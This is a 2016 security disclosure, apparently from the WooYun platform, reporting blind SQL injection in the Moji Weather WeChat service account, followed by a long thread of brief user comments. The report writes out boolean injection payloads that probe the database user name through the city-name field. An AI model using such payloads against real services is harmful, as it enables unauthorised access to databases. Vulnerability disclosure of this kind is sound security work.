墨迹天气某处SQL注入漏洞（微信公众号注入）

漏洞发生在墨迹天气微信服务号，比较有趣的漏洞，所以发出来,话不多说：

北京' and '1'='1

北京' and '1'='2

可以判断出有注入

北京' and (select length(user()))>1-- and 'a'='a
 北京' and (select length(user()))=14-- and 'a'='a
 北京' and ascii(substring(user(),1,1))>1-- and 'a'='a

判断出用户名

同理，判断出当前库：moji

还能读文件：

That's all

辛苦开发人员了

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-18 15:50

厂商回复：

漏洞Rank：8 (WooYun评价)

最新状态：

暂无

1. 2016-04-13 15:20 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   1

   沙发

   1# 回复此人

2. 2016-04-18 16:14 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

   0

   这招都想得出来。。。。 小伙砸，挺尿性啊。。。

   2# 回复此人

3. 2016-04-18 16:26 | ian ( 普通白帽子 | Rank:180 漏洞数:65 | 潜心学习)

   0

   涨姿势了 点个赞

   3# 回复此人

4. 2016-04-18 16:53 | 菜萌 ( 路人 | Rank:10 漏洞数:3 | 垃圾菜鸟一枚)

   0

   擦，这个盲注好幸苦啊

   4# 回复此人

5. 2016-04-18 16:59 | 獨孤小生 ( 路人 | Rank:12 漏洞数:3 | 妹纸 能和你交往吗 哪怕只是摸下胸部)

   0

   奇思淫路。。6666

   5# 回复此人

6. 2016-04-18 17:04 | 0x_长空 ( 实习白帽子 | Rank:36 漏洞数:19 | 真羡慕你们，这么年轻就认识才华横溢又帅气...)

   0

   吊吊吊

   6# 回复此人

7. 2016-04-18 17:05 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

   0

   666666666666

   7# 回复此人

8. 2016-04-18 17:21 | update ( 路人 | Rank:27 漏洞数:8 | 无名大学生)

   0

   流弊啊

   8# 回复此人

9. 2016-04-18 17:43 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

   0

   这招都想得出来。。。。 小伙砸，挺尿性啊。。。涨姿势了 点个赞 .擦，这个盲注好幸苦啊

   9# 回复此人

10. 2016-04-18 19:09 | K‘ ( 路人 | Rank:26 漏洞数:5 | HE MAY CONCEAL A K IN HIS HAND)

    0

    然而，8分～

    10# 回复此人

11. 2016-04-19 09:10 | un10ad ( 实习白帽子 | Rank:88 漏洞数:14 | //////)

    0

    会玩儿

    11# 回复此人

12. 2016-04-19 09:18 | sai ( 路人 | Rank:3 漏洞数:1 | 菜鸟一名)

    0

    会玩啊。。。

    12# 回复此人

13. 2016-04-19 09:27 | littelfire ( 普通白帽子 | Rank:553 漏洞数:74 | 星星之火，可以燎原。)

    0

    姿势不错啊。

    13# 回复此人

14. 2016-04-19 10:08 | 小牛牛 ( 普通白帽子 | Rank:139 漏洞数:17 | 求带)

    0

    学习了。第一次见

    14# 回复此人

15. 2016-04-19 11:04 | CCkerber ( 路人 | Rank:26 漏洞数:13 | 没有安全的系统，没有逻辑的逻辑。)

    0

    尼玛奇葩。。。

    15# 回复此人

16. 2016-04-19 11:44 | zifangsky ( 路人 | Rank:12 漏洞数:3 | 欢迎大家来访问我的个人博客)

    0

    666666666666

    16# 回复此人

17. 2016-04-19 12:37 | 小红猪 ( 普通白帽子 | Rank:341 漏洞数:62 | little red pig!)

    0

    奇思淫路。。6666 貌似之前也见有人报过

    17# 回复此人

18. 2016-04-19 12:53 | 黑名单 ( 实习白帽子 | Rank:62 漏洞数:14 | 像个傻瓜似的，为什么。)

    0

    这小婊砸 真会玩

    18# 回复此人

19. 2016-04-19 13:15 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    0

    这么敲累不累。。。

    19# 回复此人

20. 2016-04-19 15:28 | 咚咚呛 ( 普通白帽子 | Rank:263 漏洞数:34 | 我是一只小毛驴咿呀咿呀呦~~)

    0

    亮了。

    20# 回复此人

21. 2016-04-19 15:31 | 鑫森淼焱垚 ( 路人 | Rank:2 漏洞数:3 | 诗酒趁年华)

    0

    【这小婊砸 真会玩】+1

    21# 回复此人

22. 2016-04-19 16:17 | 宇文硕 ( 路人 | Rank:0 漏洞数:1 | 回收废旧彩电,冰箱,洗衣机,电风扇,电脑,电...)

    0

    这套路可以啊

    22# 回复此人

23. 2016-04-19 19:03 | sOnsec ( 普通白帽子 | Rank:116 漏洞数:31 | 安全是什么...)

    0

    叼。。。

    23# 回复此人

24. 2016-04-19 19:59 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    0

    真会玩

    24# 回复此人

25. 2016-04-20 09:16 | dafeng ( 路人 | Rank:1 漏洞数:1 | 安全无小事，成败在细节)

    0

    我去，这要试出来，天是不是都黑了

    25# 回复此人

26. 2016-04-20 09:50 | 动感超人 ( 实习白帽子 | Rank:46 漏洞数:11 | 小心动感光波)

    0

    6666666666666666

    26# 回复此人

27. 2016-04-20 12:03 | ArcticWolf ( 普通白帽子 | Rank:112 漏洞数:34 | 呃···是AW！不是AV！)

    0

    mark,就是输入太累

    27# 回复此人

28. 2016-04-20 12:20 | 铄悦 ( 路人 | Rank:4 漏洞数:1 | Do you feel the storm approach as...)

    0

    真涨姿势了

    28# 回复此人

29. 2016-04-20 13:55 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业！)

    0

    666 涨姿势了。

    29# 回复此人

30. 2016-04-20 19:32 | Kimi to futari ( 路人 | Rank:16 漏洞数:5 | (～￣▽￣)～)

    0

    涨姿势了

    30# 回复此人

31. 2016-04-21 09:17 | Whysec ( 实习白帽子 | Rank:62 漏洞数:15 )

    0

    66666666666666666

    31# 回复此人

32. 2016-04-23 01:26 | sexinsex ( 路人 | Rank:14 漏洞数:3 | 山重水复疑无路，柳暗花明又一村！)

    0

    牛逼~

    32# 回复此人

33. 2016-04-23 12:53 | havy ( 实习白帽子 | Rank:67 漏洞数:21 | 开开心心写代码)

    0

    大表哥 好6 啊

    33# 回复此人

34. 2016-04-23 23:26 | 有归于无 ( 普通白帽子 | Rank:127 漏洞数:27 | 有归于无)

    0

    和我之前想过的一样，但是没碰到过

    34# 回复此人

35. 2016-04-25 09:55 | feiyu ( 普通白帽子 | Rank:114 漏洞数:31 )

    0

    打开页面测啊

    35# 回复此人

36. 2016-04-28 17:28 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

    0

    还是你牛逼

    36# 回复此人

37. 2016-05-04 17:31 | 达子 ( 路人 | Rank:6 漏洞数:3 | 寒冷到了极致，太阳就要光临)

    0

    太坏了

    37# 回复此人